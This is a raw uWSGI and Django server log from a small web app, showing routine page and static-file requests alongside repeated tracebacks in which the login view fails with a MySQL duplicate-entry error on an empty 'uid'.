"/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1254, in _insert + return query.get_compiler(using=using).execute_sql(returning_fields) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1397, in execute_sql + cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute + return super().execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute + return self._execute_with_wrappers(sql, params, many=False, executor=self._execute) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers + return executor(sql, params, many, context) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__ + raise dj_exc_value.with_traceback(traceback) from exc_value + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +django.db.utils.IntegrityError: (1062, "Duplicate entry '' for key 'uid'") +[pid: 25874|app: 0|req: 2874/4060] 219.228.146.126 () {48 vars in 930 bytes} [Fri Jan 15 01:30:42 2021] POST /login/ => generated 208531 bytes in 141 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 1) +Internal Server Error: /login/ +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +pymysql.err.IntegrityError: (1062, "Duplicate entry '' for key 'uid'") + +The above exception was the direct cause of the following exception: + +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner + response = get_response(request) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response + response = wrapped_callback(request, *callback_args, **callback_kwargs) + File "./app01/views.py", line 245, in login + models.User.objects.create(uid=uid, password=pwd) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 447, in create + obj.save(force_insert=True, using=self.db) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 754, in save + force_update=force_update, update_fields=update_fields) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 792, in save_base + force_update, using, update_fields, + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 895, in _save_table + results = self._do_insert(cls._base_manager, using, fields, returning_fields, raw) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 935, in _do_insert + using=using, raw=raw, + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1254, in _insert + return query.get_compiler(using=using).execute_sql(returning_fields) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1397, in execute_sql + cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute + return super().execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute + return self._execute_with_wrappers(sql, params, many=False, executor=self._execute) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers + return executor(sql, params, many, context) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__ + raise dj_exc_value.with_traceback(traceback) from exc_value + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +django.db.utils.IntegrityError: (1062, "Duplicate entry '' for key 'uid'") +[pid: 25874|app: 0|req: 2875/4061] 101.84.174.113 () {48 vars in 1127 bytes} [Fri Jan 15 01:30:43 2021] POST /login/ => generated 208770 bytes in 169 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 0) +[pid: 25874|app: 0|req: 2876/4062] 180.160.49.210 () {38 vars in 929 bytes} [Fri Jan 15 01:30:43 2021] GET /login => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 175 bytes (1 switches on core 1) +[pid: 25874|app: 0|req: 2877/4063] 180.160.49.210 () {38 vars in 931 bytes} [Fri Jan 15 01:30:43 2021] GET /login/ => generated 6428 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 25874|app: -1|req: -1/4064] 180.160.49.210 () {40 vars in 971 bytes} [Fri Jan 15 01:30:43 2021] GET /static/css/bootstrap.css => generated 118128 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 1) +[pid: 25874|app: -1|req: -1/4065] 180.160.49.210 () {40 vars in 993 bytes} [Fri Jan 15 01:30:44 2021] GET /static/css/bootstrap-responsive.css => generated 20999 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 25874|app: -1|req: -1/4066] 180.160.49.210 () {40 vars in 975 bytes} [Fri Jan 15 01:30:44 2021] GET /static/css/prettyPhoto.css => generated 26845 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 25874|app: -1|req: -1/4067] 180.160.49.210 () {40 vars in 973 bytes} [Fri Jan 15 01:30:44 2021] GET /static/css/flexslider.css => generated 3552 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 25874|app: -1|req: -1/4068] 180.160.49.210 () {40 vars in 979 bytes} [Fri Jan 15 01:30:44 2021] GET /static/css/custom-styles.css => generated 20296 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 25874|app: -1|req: -1/4069] 180.160.49.210 () {40 vars in 954 bytes} [Fri Jan 15 01:30:44 2021] GET /static/js/jquery.min.js => generated 86596 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[uwsgi-http key: 188.131.132.108:8000 client_addr: 180.160.49.210 client_port: 47811] hr_write(): Broken pipe [plugins/http/http.c line 565] +[uwsgi-http key: 188.131.132.108:8000 client_addr: 180.160.49.210 client_port: 45763] hr_write(): Broken pipe [plugins/http/http.c line 565] +[uwsgi-http key: 188.131.132.108:8000 client_addr: 180.160.49.210 client_port: 48835] hr_write(): Broken pipe [plugins/http/http.c line 565] +[pid: 25874|app: 0|req: 2878/4070] 114.42.220.207 () {38 vars in 898 bytes} [Fri Jan 15 01:30:45 2021] GET /home/single.html => generated 10766 bytes in 13 msecs (HTTP/1.1 200) 6 headers in 182 bytes (1 switches on core 1) +[pid: 25874|app: 0|req: 2879/4071] 219.228.146.126 () {48 vars in 930 bytes} [Fri Jan 15 01:30:48 2021] POST /login/ => generated 27 bytes in 18 msecs (HTTP/1.1 200) 7 headers in 324 bytes (1 switches on core 0) +[pid: 25874|app: 0|req: 2880/4072] 219.228.146.126 () {40 vars in 889 bytes} [Fri Jan 15 01:30:48 2021] GET /home/ => generated 11129 bytes in 11 msecs (HTTP/1.1 200) 6 headers in 182 bytes (1 switches on core 1) +[pid: 25874|app: -1|req: -1/4073] 219.228.146.126 () {38 vars in 822 bytes} [Fri Jan 15 01:30:48 2021] GET /static/img/t_photo/2_u%E7%9B%98.jpg => generated 14933 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 25874|app: -1|req: -1/4074] 219.228.146.126 () {38 vars in 816 bytes} [Fri Jan 15 01:30:48 2021] GET /static/img/t_photo/4_math.png => generated 587232 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 0) +[pid: 25874|app: -1|req: -1/4075] 219.228.146.126 () {38 vars in 818 bytes} [Fri Jan 15 01:30:48 2021] GET /static/img/t_photo/10_love.jpg => generated 15609 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 25874|app: 0|req: 2881/4076] 114.42.220.207 () {38 vars in 898 bytes} [Fri Jan 15 01:30:49 2021] GET /home/single.html => generated 10766 bytes in 13 msecs (HTTP/1.1 200) 6 headers in 182 bytes (1 switches on core 0) +[pid: 25874|app: 0|req: 2882/4077] 180.160.49.210 () {40 vars in 1020 bytes} [Fri Jan 15 01:30:49 2021] GET /login/ => generated 6428 bytes in 3 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 25874|app: -1|req: -1/4078] 219.228.146.126 () {38 vars in 835 bytes} [Fri Jan 15 01:30:49 2021] GET /static/img/back-top-btn.png => generated 1789 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +Internal Server Error: /login/ +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +pymysql.err.IntegrityError: (1062, "Duplicate entry '' for key 'uid'") + +The above exception was the direct cause of the following exception: + +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner + response = get_response(request) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response + response = wrapped_callback(request, *callback_args, **callback_kwargs) + File "./app01/views.py", line 245, in login + models.User.objects.create(uid=uid, password=pwd) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 447, in create + obj.save(force_insert=True, using=self.db) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 754, in save + force_update=force_update, update_fields=update_fields) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 792, in save_base + force_update, using, update_fields, + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 895, in _save_table + results = self._do_insert(cls._base_manager, using, fields, returning_fields, raw) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 935, in _do_insert + using=using, raw=raw, + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1254, in _insert + return query.get_compiler(using=using).execute_sql(returning_fields) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1397, in execute_sql + cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute + return super().execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute + return self._execute_with_wrappers(sql, params, many=False, executor=self._execute) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers + return executor(sql, params, many, context) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__ + raise dj_exc_value.with_traceback(traceback) from exc_value + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +django.db.utils.IntegrityError: (1062, "Duplicate entry '' for key 'uid'") +[pid: 25874|app: 0|req: 2883/4079] 101.84.174.113 () {48 vars in 1128 bytes} [Fri Jan 15 01:30:51 2021] POST /login/ => generated 208835 bytes in 96 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 1) +[pid: 25874|app: 0|req: 2884/4080] 219.228.146.126 () {40 vars in 892 bytes} [Fri Jan 15 01:30:56 2021] GET /publish => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 177 bytes (1 switches on core 0) +[pid: 25874|app: 0|req: 2885/4081] 219.228.146.126 () {40 vars in 894 bytes} [Fri Jan 15 01:30:57 2021] GET /publish/ => generated 5325 bytes in 5 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 25874|app: 0|req: 2886/4082] 114.42.220.207 () {38 vars in 898 bytes} [Fri Jan 15 01:30:57 2021] GET /home/single.html => generated 10766 bytes in 16 msecs (HTTP/1.1 200) 6 headers in 182 bytes (1 switches on core 1) +[pid: 25874|app: 0|req: 2887/4083] 219.228.146.126 () {40 vars in 910 bytes} [Fri Jan 15 01:31:00 2021] GET /ownpublish-0-0-0 => generated 10087 bytes in 15 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0) +[pid: 25874|app: -1|req: -1/4084] 219.228.146.126 () {38 vars in 782 bytes} [Fri Jan 15 01:31:00 2021] GET /static/js/jquery.easing.1.3.js => generated 8097 bytes in 1 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 25874|app: -1|req: -1/4085] 219.228.146.126 () {38 vars in 780 bytes} [Fri Jan 15 01:31:00 2021] GET /static/js/jquery.quicksand.js => generated 14697 bytes in 1 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 25874|app: 0|req: 2888/4086] 114.42.220.207 () {36 vars in 818 bytes} [Fri Jan 15 01:31:02 2021] GET /login/ => generated 6428 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 25874|app: 0|req: 2889/4087] 114.42.220.207 () {46 vars in 950 bytes} [Fri Jan 15 01:31:03 2021] POST /login/ => generated 27 bytes in 21 msecs (HTTP/1.1 200) 7 headers in 324 bytes (1 switches on core 1) +[pid: 25874|app: 0|req: 2890/4088] 114.42.220.207 () {38 vars in 865 bytes} [Fri Jan 15 01:31:04 2021] GET /home/ => generated 10766 bytes in 14 msecs (HTTP/1.1 200) 6 headers in 182 bytes (1 switches on core 0) +[pid: 25874|app: 0|req: 2891/4089] 219.228.146.126 () {40 vars in 907 bytes} [Fri Jan 15 01:31:05 2021] GET /all-0-0-0 => generated 13895 bytes in 16 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1) +[pid: 25874|app: -1|req: -1/4090] 219.228.146.126 () {38 vars in 818 bytes} [Fri Jan 15 01:31:05 2021] GET /static/img/t_photo/wrong.jpg => generated 1420 bytes in 1 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0) +[pid: 25874|app: -1|req: -1/4091] 219.228.146.126 () {38 vars in 850 bytes} [Fri Jan 15 01:31:05 2021] GET /static/img/t_photo/13_%E6%B2%A1%E5%90%AC%E6%87%82.png => generated 215061 bytes in 4 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 1) +[pid: 25874|app: -1|req: -1/4092] 219.228.146.126 () {38 vars in 820 bytes} [Fri Jan 15 01:31:05 2021] GET /static/img/t_photo/16_OIP.jpg => generated 9197 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0) +[pid: 25874|app: -1|req: -1/4093] 219.228.146.126 () {38 vars in 850 bytes} [Fri Jan 15 01:31:05 2021] GET /static/img/t_photo/18_%E4%B8%8D%E7%86%AC%E5%A4%9C.jpg => generated 16999 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 25874|app: 0|req: 2892/4094] 114.42.220.207 () {36 vars in 817 bytes} [Fri Jan 15 01:31:05 2021] GET /login/ => generated 6428 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 25874|app: 0|req: 2893/4095] 114.42.220.207 () {46 vars in 950 bytes} [Fri Jan 15 01:31:06 2021] POST /login/ => generated 27 bytes in 26 msecs (HTTP/1.1 200) 7 headers in 324 bytes (2 switches on core 0) +[pid: 25874|app: 0|req: 2894/4096] 114.42.220.207 () {38 vars in 865 bytes} [Fri Jan 15 01:31:07 2021] GET /home/ => generated 10766 bytes in 14 msecs (HTTP/1.1 200) 6 headers in 182 bytes (1 switches on core 1) +[pid: 25874|app: 0|req: 2895/4097] 219.228.146.126 () {40 vars in 898 bytes} [Fri Jan 15 01:31:07 2021] GET /single/2 => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 178 bytes (1 switches on core 0) +[pid: 25874|app: 0|req: 2896/4098] 219.228.146.126 () {40 vars in 900 bytes} [Fri Jan 15 01:31:07 2021] GET /single/2/ => generated 9565 bytes in 13 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 25874|app: 0|req: 2897/4099] 114.42.220.207 () {38 vars in 887 bytes} [Fri Jan 15 01:31:09 2021] GET /home/single.html => generated 10766 bytes in 14 msecs (HTTP/1.1 200) 6 headers in 182 bytes (1 switches on core 1) +[pid: 25874|app: 0|req: 2898/4100] 114.42.220.207 () {38 vars in 898 bytes} [Fri Jan 15 01:31:11 2021] GET /home/single.html => generated 10766 bytes in 13 msecs (HTTP/1.1 200) 6 headers in 182 bytes (1 switches on core 0) +[pid: 25874|app: 0|req: 2899/4101] 180.160.45.61 () {38 vars in 927 bytes} [Fri Jan 15 01:31:12 2021] GET /login => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 175 bytes (1 switches on core 1) +[pid: 25874|app: 0|req: 2900/4102] 180.160.45.61 () {38 vars in 929 bytes} [Fri Jan 15 01:31:12 2021] GET /login/ => generated 6428 bytes in 3 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 25874|app: -1|req: -1/4103] 180.160.45.61 () {40 vars in 969 bytes} [Fri Jan 15 01:31:12 2021] GET /static/css/bootstrap.css => generated 118128 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 1) +[pid: 25874|app: -1|req: -1/4104] 180.160.45.61 () {40 vars in 991 bytes} [Fri Jan 15 01:31:12 2021] GET /static/css/bootstrap-responsive.css => generated 20999 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 25874|app: -1|req: -1/4105] 180.160.45.61 () {40 vars in 973 bytes} [Fri Jan 15 01:31:12 2021] GET /static/css/prettyPhoto.css => generated 26845 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 25874|app: -1|req: -1/4106] 180.160.45.61 () {40 vars in 971 bytes} [Fri Jan 15 01:31:12 2021] GET /static/css/flexslider.css => generated 3552 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 25874|app: -1|req: -1/4107] 180.160.45.61 () {40 vars in 951 bytes} [Fri Jan 15 01:31:12 2021] GET /static/js/jquery.min.js => generated 86596 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 25874|app: -1|req: -1/4108] 180.160.45.61 () {40 vars in 975 bytes} [Fri Jan 15 01:31:12 2021] GET /static/css/custom-styles.css => generated 20296 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[uwsgi-http key: 188.131.132.108:8000 client_addr: 180.160.45.61 client_port: 1172] hr_write(): Broken pipe [plugins/http/http.c line 565] +[pid: 25874|app: 0|req: 2901/4109] 180.160.45.61 () {40 vars in 1017 bytes} [Fri Jan 15 01:31:15 2021] GET /login/ => generated 6428 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 25874|app: -1|req: -1/4110] 180.160.45.61 () {40 vars in 968 bytes} [Fri Jan 15 01:31:15 2021] GET /static/css/bootstrap.css => generated 118128 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 1) +[pid: 25874|app: -1|req: -1/4111] 180.160.45.61 () {40 vars in 972 bytes} [Fri Jan 15 01:31:15 2021] GET /static/css/prettyPhoto.css => generated 26845 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 25874|app: -1|req: -1/4112] 180.160.45.61 () {40 vars in 990 bytes} [Fri Jan 15 01:31:15 2021] GET /static/css/bootstrap-responsive.css => generated 20999 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 25874|app: -1|req: -1/4113] 180.160.45.61 () {40 vars in 976 bytes} [Fri Jan 15 01:31:15 2021] GET /static/css/custom-styles.css => generated 20296 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 25874|app: -1|req: -1/4114] 180.160.45.61 () {40 vars in 951 bytes} [Fri Jan 15 01:31:15 2021] GET /static/js/jquery.min.js => generated 86596 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 25874|app: -1|req: -1/4115] 180.160.45.61 () {40 vars in 957 bytes} [Fri Jan 15 01:31:15 2021] GET /static/js/jquery.custom.js => generated 3065 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 25874|app: -1|req: -1/4116] 180.160.45.61 () {40 vars in 949 bytes} [Fri Jan 15 01:31:15 2021] GET /static/js/bootstrap.js => generated 56264 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 25874|app: -1|req: -1/4117] 180.160.45.61 () {40 vars in 965 bytes} [Fri Jan 15 01:31:15 2021] GET /static/js/jquery.flexslider.js => generated 40181 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 25874|app: -1|req: -1/4118] 180.160.45.61 () {40 vars in 967 bytes} [Fri Jan 15 01:31:15 2021] GET /static/js/jquery.prettyPhoto.js => generated 35912 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 25874|app: -1|req: -1/4119] 180.160.45.61 () {40 vars in 1046 bytes} [Fri Jan 15 01:31:20 2021] GET /static/img/page-bg-1.jpg => generated 1600 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 25874|app: -1|req: -1/4120] 180.160.45.61 () {40 vars in 1052 bytes} [Fri Jan 15 01:31:20 2021] GET /static/img/back-top-btn.png => generated 1789 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 25874|app: -1|req: -1/4121] 180.160.45.61 () {40 vars in 1020 bytes} [Fri Jan 15 01:31:21 2021] GET /static/img/favicon.ico => generated 1150 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 25874|app: 0|req: 2902/4122] 114.42.220.207 () {38 vars in 873 bytes} [Fri Jan 15 01:31:21 2021] GET /all-0-0-0 => generated 13838 